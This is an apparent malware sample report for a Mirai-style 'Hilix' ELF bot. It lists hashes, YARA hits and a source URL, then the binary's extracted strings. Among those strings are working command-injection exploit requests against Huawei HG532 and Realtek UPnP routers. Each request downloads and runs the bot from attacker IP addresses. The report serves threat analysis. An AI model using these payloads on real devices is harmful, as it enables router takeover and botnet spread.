Sample details: fa1176573fa24138182c7d9402ed460c --

Hashes
MD5: fa1176573fa24138182c7d9402ed460c
SHA1: 022373dfbceaa212788f9e457fd131f8eeb297cd
SHA256: 1a8d260ab4be3d1ecc5fab47e47f75777438d174e5b4dbab33a1cba73c2dc356
SSDEEP: 768:pevCUl+4lGCSWaKeCCYeFF/WotuZeeeRESWf3fTuUN09Toi8sTsEl:pGCa+CSD6CF/WocZRoYfTuS09X8isEl
Details
File Type: ELF
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1 |
Source
http://23.82.185.164/bins/Hilix.m68k
Strings
		N^NuNV
LN^NuNV
N^NuNV
N^NuNV
 OHWHQHy
&/|JR**
N^NuNV
N^NuNV
o2$	"D(
D THx@
N^Nu"/
NuNq o
b(p7 B
p7N@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
p@N@-@
N^NuNV
"	p6N@-@
N^NuNuNV
p%N@-@
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
pUN@-@
N^NuNV
N^NuNV
pBN@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNuNV
 @N^NuNuNV
 @N^NuNV
X @N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
 @N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
 @N^NuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
HN^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
NqNuNV
"	pfN@-@
N^NuNuNV
N^NuNV
"	plN@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
 @N^NuNuNV
p+N@-@
N^NuNuNV
LN^NuNV
DN^NuNV
N^NuNV
N^NuNV
 @N^NuNuNV
N^NuNuNV
N^NuNV
NqNuNV
N^NuNV
p-N@-@
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
%$N^NuPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.82.185.164 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
23.82.185.164
Hilix @Usip
POST /picdesc.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://159.203.44.33/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /wanipcn.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://23.82.185.164/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
,7gaee
,7gael
,7gaea
fdeadbdf
"' 5&759fdea
. 1m,ea
"1& 1,fa1? ?'efg
0125!8 
5: '8%
5%!5&=;
'!$$;& 
$5''#;&0
509=:efg`
& agad
<;`!?!b5 
?;: fdd`
<!: acam
509=:efg
g1$a#f!
'<188T
1:5681T
'-' 19T
{6=:{6!'-6;,t
nt5$$81 t:; t2;!:0T
:7;&&17 T
{6=:{6!'-6;,t$'T
{6=:{6!'-6;,t?=88tymtT
{$&;7{T
{95$'T
{$&;7{:1 { 7$T
{' 5 !'T
z5:=91T
{$&;7{:1 {&;! 1T
5''#;&0T
{1 7{&1';8"z7;:2T
:591'1&"1&tT
{01"{#5 7<0;3T
{01"{9='7{#5 7<0;3T
$662*7!E
1: 1&T
e365`70;9ag:<$ef1=d?2>T
;::17 10t
;!&71t
:3=:1t
?/dev/null
.shstrtab
.rodata
.ctors
.dtors